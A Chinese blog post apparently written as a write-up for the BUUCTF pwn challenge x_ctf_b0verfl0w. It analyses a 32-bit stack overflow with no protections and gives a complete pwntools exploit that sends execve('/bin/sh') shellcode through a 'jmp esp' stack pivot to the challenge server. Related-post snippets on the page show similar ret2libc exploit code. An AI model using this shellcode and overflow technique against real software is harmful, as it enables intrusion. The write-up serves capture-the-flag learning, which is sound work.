x_ctf_b0verfl0w

最新推荐文章于 2024-06-23 22:42:45 发布
最新推荐文章于 2024-06-23 22:42:45 发布
阅读量80 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/133046649
版权

x_ctf_b0verfl0w

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

32位,保护全关,写shellcode

int vul()
{
  char s[32]; // [esp+18h] [ebp-20h] BYREF

  puts("\n======================");
  puts("\nWelcome to X-CTF 2016!");
  puts("\n======================");
  puts("What's your name?");
  fflush(stdout);
  fgets(s, 0x32, stdin);
  printf("Hello %s.", s);
  fflush(stdout);
  return 1;
}

栈溢出

并且有个hit

.text:08048504                               ; ---------------------------------------------------------------------------
.text:08048504 FF E4                         jmp     esp
.text:08048504
.text:08048506                               ; ---------------------------------------------------------------------------
.text:08048506 C3                            retn
.text:08048506
.text:08048507                               ; ---------------------------------------------------------------------------
.text:08048507 B8 01 00 00 00                mov     eax, 1
.text:0804850C 5D                            pop     ebp
.text:0804850D C3                            retn
.text:0804850D                               ; } // starts at 80484FD
.text:0804850D

给出了jmp esp

思路

用jmp再去执行一次栈,栈里面写好shellcode

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",27413,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')

esp=asm("sub esp,0x28;jmp esp")
pl=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
pl=pl.ljust(0x24,b'\x00')+p32(0x8048504)+esp
sl(pl)
ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF(pwn)x_ctf_b0verfl0w [ret2libc类型]
半岛铁盒的博客
04-06 403
是ret2libc类型 from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',25524) elf = ELF('./b0verfl0w') puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main=0x804850e payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got) p.s.
[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)
mcmuyanga的博客
02-04 1199
x_ctf_b0verfl0w 附件 步骤 例行检查,32位程序,开启了RELRO(不可改写got表) 本地试运行一下程序,看看大概的情况 32位ida载入 fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode 在hit函数中找到了jump esp的gadget 因此我们可以构造这样的栈
x_ctf_b0verfl0ww
z1r0的博客
01-11 982
x_ctf_b0verfl0ww 查看保护 有溢出但是空间小不可以ret2libc。没开nx看见不有一个hint 有个jmp esp,这是一个好跳板,可以去看一下0day安全这个书,里面讲到了jmp esp的灵活运用。写shellcode进去,然后通过jmp esp 和 sub esp, xx,jmp esp来执行shellcode即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name
BUUCTF(pwn)x_ctf_b0verfl0w
半岛铁盒的博客
04-01 359
flag的地址有了 execve() – 叫做执行程序函数 就像Python中的os.system(cmd)这个函数,我们可以用这个函数来执行我们的shell脚本,单独的shell命令,或者是调用其他的程序,我们的execve()这个函数就和Python中的os.system函数类似,可以调用其他程序的执行,执行shell命令,,调用脚本等等功能。 from pwn import* flag=0x401157 payload='a'*(0x110+8)+p64(flag) p=remote('..
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 551
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
hac.zip_CTF信息隐写_ctf
09-23
CTF信息隐写,非常简单的入门小实验,带你走进CTF
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF神器_ctf
09-23
对网站文件管理,对网站后台文件进行扫描。。
【Writeup】X-CTF Quals 2016_Pwn_b0verfl0w
BAKUMANSEC - Just Do It
09-02 536
0x01 解题思路 查看文件信息   没有开NX,可以向栈上写入shellcode。防护措施只开了一个Partial RELRO,这意味着每次栈加载的地址会变化。 拖入IDA 32 bits查看 main函数里只有一个vuln函数   显然存在栈溢出,但是只能输入50个字节,而填充的padding字段就需要0x20+4=36个字节,再加上EIP,一共40个字节,只有10个字节的shellc...
X-CTF Quals 2016 - b0verfl0w [Stack Pivoting]
ACdream
02-13 862
学习资料: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#stack-pivoting 为什么要使用? (1)栈溢出时,覆盖后剩下的栈空间不够写exp、ROP等溢出利用 (2)开启了PIE,栈地址不固定,没法利用 要求:可以控制EIP或ESP的至少一个,利用gadgets: pop esp...
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 154
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
【安全】Linux Fanotify使用入门
追寻梦想的青春
06-19 905
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
企业防盗版,如何保障上网安全
shenxinda_lu的博客
06-20 351
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
.hmallox勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
最新发布
weixin_13318844580的博客
06-23 897
导言:在当今数字化时代,勒索病毒已经成为网络安全的一大威胁,其中包括了最近出现的.hmallox勒索病毒。这类恶意软件不仅能够对计算机系统进行加密,还会要求用户支付赎金以换取解密密钥,给个人用户和企业带来了严重的损失和困扰。当面对被勒索病毒攻击导致的数据文件加密问题时,您可添加我们的技术服务号(sjhf91)。我们将为您提供专业、快速的数据恢复技术支持。
Java中的加密与解密:实现安全的数据传输
java666668888的博客
06-23 410
大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!在当今信息安全至关重要的时代,保护数据的安全性是每个开发人员都需要关注的重要议题。本文将深入探讨Java中的加密与解密技术,帮助你实现安全的数据传输。
安全基础考核总结
qq_44217534的博客
06-23 468
暂未总结好,也未找到合适的文章,后续补充吧。Antivirus(AV)防病毒。在防火墙的前世今生那里有。我认为就是下述的攻击。
腾讯云 - 边缘安全加速平台 EO、内容分发网络 CDN、全站加速网络 ECDN、安全加速 SCDN 等产品对比
牧码的博客
06-20 347
腾讯云 - 边缘安全加速平台 EO、内容分发网络 CDN、全站加速网络 ECDN、安全加速 SCDN 等产品对比

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值